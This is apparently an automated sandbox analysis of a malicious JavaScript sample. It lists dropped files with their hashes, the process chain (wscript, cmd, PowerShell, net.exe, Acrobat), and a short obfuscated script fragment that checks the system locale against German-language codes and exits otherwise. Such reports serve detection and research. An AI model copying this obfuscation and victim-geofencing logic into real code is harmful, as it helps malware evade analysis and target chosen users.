C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.669416039473633 |
Encrypted: | false |
SSDEEP: | 24:Yv6XR1zzvBhamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS4:Yvm1/rBgkDMUJUAh8cvM4 |
MD5: | 8B32B1241E8D343695DBA4D7A66A4989 |
SHA1: | 6158562FB33A6CF55581BAFF06C3707994C3F1DD |
SHA-256: | 0194E92A3221757EB480D57F43386AEF2C15BAB287703562654ECE9518547F1D |
SHA-512: | 78CCA45D47FC4B3E1D42518BF3E373046113B2BC362B43C7E2BCD6E85F99698BC36103372CAE777D88DA4191F489F50F158E2D6132C52887BD7FDCF686B45AE3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2711645252223915 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfshHHrPeUkwRe9:YvXKXR1zZc0vBkGUUUkee9 |
MD5: | A3F12C83BE46A2BEB9F5BAE8E52AA44B |
SHA1: | 3FD018C366ECA61EFCD334563569082A34687C4A |
SHA-256: | 932B76BFC2EABCD9E4B54F7739F7661934ADA23965605E6E46DC0B3D44C594F9 |
SHA-512: | 1390569177A5CF555CC90E20C126121418993DD0599315355D03CA031F07B3A442CC121EA96D8EA0332DFACA2EE88FBF92D14ECEB00AB1389373D1C108D15A2D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.284240033427647 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJTqgFCrPeUkwRe9:YvXKXR1zZc0vBkGTq16Ukee9 |
MD5: | 8BC02EC11E9C491FA7F2C67B98115F6D |
SHA1: | 5A74E33E6E9EF92FBC0BBBD478AE0B0A9E3B6F24 |
SHA-256: | 798E929B374B5B87F1FB13B6D1466F4C9A208FEDA418423BDAF90573F1695B14 |
SHA-512: | 7A71C24495B873C2565EA7CB9BB39F96DD6A2FB70661270A8D7318077608678C830BEF5D027D63BD4FDF8D507752301F1CA63608A1729CEEDBDAD9A5228613C0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.134826530522214 |
Encrypted: | false |
SSDEEP: | 24:Yd/zEal0ayFTJl9UeHBpIQ3d7WB40jNQsj0Ssf9o2Kv2LSeCfBODLD0H5eE975VQ:YIn9PHBptEdNQ+xjAKBODLDgZ9o |
MD5: | A27E6998AEDE99F4DDCBC30BDCC4B1BA |
SHA1: | E42763CB615308FCB6AE42FC5B54F9DDBF1338DA |
SHA-256: | 2D86B2736851ED0CB73F9BCDAA32164CB105AE958B490A0F6AD5F5739E8BEC17 |
SHA-512: | 19E77A2F2D13FF4A02FAC4F89DFE839EBFF504E893F4395E0DFC45A8170CBB04832A40DB11CBD99ECE8BC27E52C40DADDE2E4177477BA9761DAF79D159960FE5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.188336943592008 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUUSvR9H9vxFGiDIAEkGVvp2:lNVmswUUUUUUUUU+FGSIt6 |
MD5: | BF97C4F80499F133B9DF8500F76BD936 |
SHA1: | 2CE04AA5BCA589D1701FB25FC0436F20EF174142 |
SHA-256: | C631773C929F0C468EAB2CE34D174538E67EBD1C13AB61B7E83CA263432EEC00 |
SHA-512: | 4440E45FA0DFD2A439C3139DE550897BE7C3C15A9215E6E29EE6F0FF08E8786D52D98C65D17110E6C55592F120520EF956DA6622569B6958E7602C396F25342B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6075259880229562 |
Encrypted: | false |
SSDEEP: | 48:7MUKUUUUUUUUUU2vR9H9vxFGiDIAEkGVvMqFl2GL7msTu:78UUUUUUUUUU6FGSItSKVmsi |
MD5: | AB9AF1D943A6B4F4B7B67FB299F5ACB1 |
SHA1: | BEC7CCFABDF1D61F55F4761E1EA07D1A8D0F92FD |
SHA-256: | 9C0D83D37319C50F3B80AE327E257852CF18FD150C5567B9DBB831176086E409 |
SHA-512: | D2986FD917DC214FE2BD424897C3B539991F05B0573093527101C078254E1E6FC3B8BDA5A4F1F461CED2BEB391E8B16464BB0B565A93811294651FB6B0A9D687 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgfvXkg74xPkXRDaU+tp0RN/2WYyu:6a6TZ44ADEfvUg74SabQUWK |
MD5: | CBF6D011D7C9741A7F30953466729031 |
SHA1: | DEBBA9D433B4F72300631314936820BCA48660B1 |
SHA-256: | 2D99ED29F518FF9639A57C6498385411CCD715F400D1FC13F97C44D07289897B |
SHA-512: | 3DEA9240EF17F03BCAF844AA32B56DBFAA1B1A0AC99601205F81C2563821931F935DA55F790DC40127143EA361A367E7AFA9008B7FE4C2741E825ED2B594D1FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.493870954423123 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClWltH:Qw946cPbiOxDlbYnuRK+br1 |
MD5: | E68274998590B11E7F70EC3B22170925 |
SHA1: | D19DE33CEBE6505742B29FFBA727CF4DBA19B69C |
SHA-256: | 143D3F872E1DDA8647984D2A0CD222F6971BB3ED04E3C057DEC1AF1B3237E13E |
SHA-512: | E457D25C0F25192DAA22D344682B696107D434B49F9377F73F1C2045DA27DA19F96A836B5EB3C8CC39D8F3C4017CCD1358A916F232E727B5BC478F7D0F772491 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 22-14-11-065.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.3314198061115325 |
Encrypted: | false |
SSDEEP: | 384:PJ3EPR2VHOvZNELamrcpFL+3DghZ1222XLEY69txhS1T9aQ1LSch7P67WEuXBAY1:1ue |
MD5: | DDA6047AF4EC7D44582ED109F7BD6CD3 |
SHA1: | F8B21C604CADC81F7CF91B94D163193FC8BFFE81 |
SHA-256: | 4D4629ED8893B52A5542328FB7D9A3EFBBC54308B4C7F6E9A7D129B2355A916A |
SHA-512: | 20E3BA81656BC1E6005906B7F4BCC8966F4042C055ACE014FE37B3CF4808BF6AB69DC05A78272053DC28A50818C9B6AADC802CBD68E12A3685C72F4DECCE6365 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.381893702885406 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r4:bI |
MD5: | 9A7BFA63E3A5F93139C76767AB2CF7BE |
SHA1: | E8E6B831FC6227E409F35088AB5487D18C8E0277 |
SHA-256: | 37E6E5A642ED0B4221E384D0AE13CE24B800491558A64012AB2E0E76030A5F90 |
SHA-512: | 9DE6EDE478E72BA29035C7C4478113A1174919492FE5871A0B056CE120208D1665306DC8357C631A5AC538A2201DCC33A0A1F2A0D20CB54FE1BE0103F85B5F46 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/nZXYIGNPpeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZXZGeWLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 8B9A388440CFE3BFA95587E34B7BE149 |
SHA1: | 64B74497856A696252797E130D819CB147870A77 |
SHA-256: | 63DE1DC0683CEFDE940AE3FD2970C7BB91A507B13EC28F75F9C51039831CB82D |
SHA-512: | 6B21038A24D4AAFCBB371D84CF0B76019ACD6A9F70E5D30E9FD491989DF2999C884E0C49273B66C1D6D6E2C369FF28A04F9805079B025B0D77CD857DCA61457B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.920602337461767 |
TrID: | |
File name: | 3236235451745230764.js |
File size: | 19'192 bytes |
MD5: | cbd9eb579210b0a29068684ab1659cc4 |
SHA1: | f0a1fa465f9e4d5586203871d0e6b3aa4b5745f6 |
SHA256: | 41347fe6fb945cc191a9fc1813f8fcc1475619b9f457428354fc2db2bc8718bc |
SHA512: | 5ef9971ec123891d74a652414a0ce1a4503d64d8100ef967b77760f3386909fbfd1062cbf91751963100e9555fcc6d6d054add8b9427eaeb76b2b7360623a117 |
SSDEEP: | 384:RPwIOnSPYAIJcSXgelL7Y8rKuPpooz96troo8L4Rih6EWaCvLGd+SO6fvREEjDtn:RolSPYAIJcSXgelLMfuPpooz96troo8t |
TLSH: | 908287D0E20B694BCCD412F525FF201A6799916D8F685AEE68D5301C0B9EB27CCF7172 |
File Content Preview: | function mzazux(){aereuim=[1031,3079,5127,4103,2055,3072];var tavylau=this[wkaxbe+mzipsg+lspibjvou+oiuqjba+vmjomwr+gzvvne+tyqkihhxx+isojia](this[etkott+oqivgdri+wieuok+lspibjvou+clriavgp+wkaxbe+isojia][unlshe+lspibjvou+vmjomwr+mzipsg+isojia+vmjomwr+ptthwd |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 22:14:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70b050000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 22:14:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74e060000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 22:14:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 22:14:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 22:14:07 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 22:14:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74e060000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 22:14:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ac680000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 22:14:08 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 22:14:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 22:14:09 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function mzazux() { |
|
1 | aereuim = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var tavylau = this[wkaxbe + mzipsg + lspibjvou + oiuqjba + vmjomwr + gzvvne + tyqkihhxx + isojia] ( this[etkott + oqivgdri + wieuok + lspibjvou + clriavgp + wkaxbe + isojia][unlshe + lspibjvou + vmjomwr + mzipsg + isojia + vmjomwr + ptthwdwtl + viapicp + sxwom + vmjomwr + wieuok + isojia] ( etkott + oqivgdri + wieuok + lspibjvou + clriavgp + wkaxbe + isojia + rsolbz + oqivgdri + dvrmhvbv + vmjomwr + sjkxsh + sjkxsh ) [ajhnjw + vmjomwr + mubqqobc + ajhnjw + vmjomwr + mzipsg + dycuqmky] ( hvnnisr + tialf + iwntcbb + teckteq + tdxws + unlshe + zvhqk + ajhnjw + ajhnjw + iwntcbb + uyqsa + ntovpn + tdxws + zvhqk + oqivgdri + iwntcbb + ajhnjw + caqtah + unlshe + skcfbmcd + tyqkihhxx + isojia + lspibjvou + skcfbmcd + sjkxsh + gtwctc + tmxbbry + mzipsg + tyqkihhxx + vmjomwr + sjkxsh + caqtah + gzvvne + tyqkihhxx + isojia + vmjomwr + lspibjvou + tyqkihhxx + mzipsg + isojia + clriavgp + skcfbmcd + tyqkihhxx + mzipsg + sjkxsh + caqtah + byhhwxwas + skcfbmcd + wieuok + mzipsg + sjkxsh + vmjomwr ), 16 ); |
|
3 | for ( qtbapr = 0 ; qtbapr < aereuim[sjkxsh + vmjomwr + tyqkihhxx + mubqqobc + isojia + dvrmhvbv] ; ++ qtbapr ) | |
4 | { | |
5 | if ( tavylau == aereuim[qtbapr] ) | |
6 | { | |
7 | tavylau = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( tavylau !== true ) | |
12 | this[etkott + oqivgdri + wieuok + lspibjvou + clriavgp + wkaxbe + isojia][uginrrjf + oujhidztt + clriavgp + isojia] ( ); | |
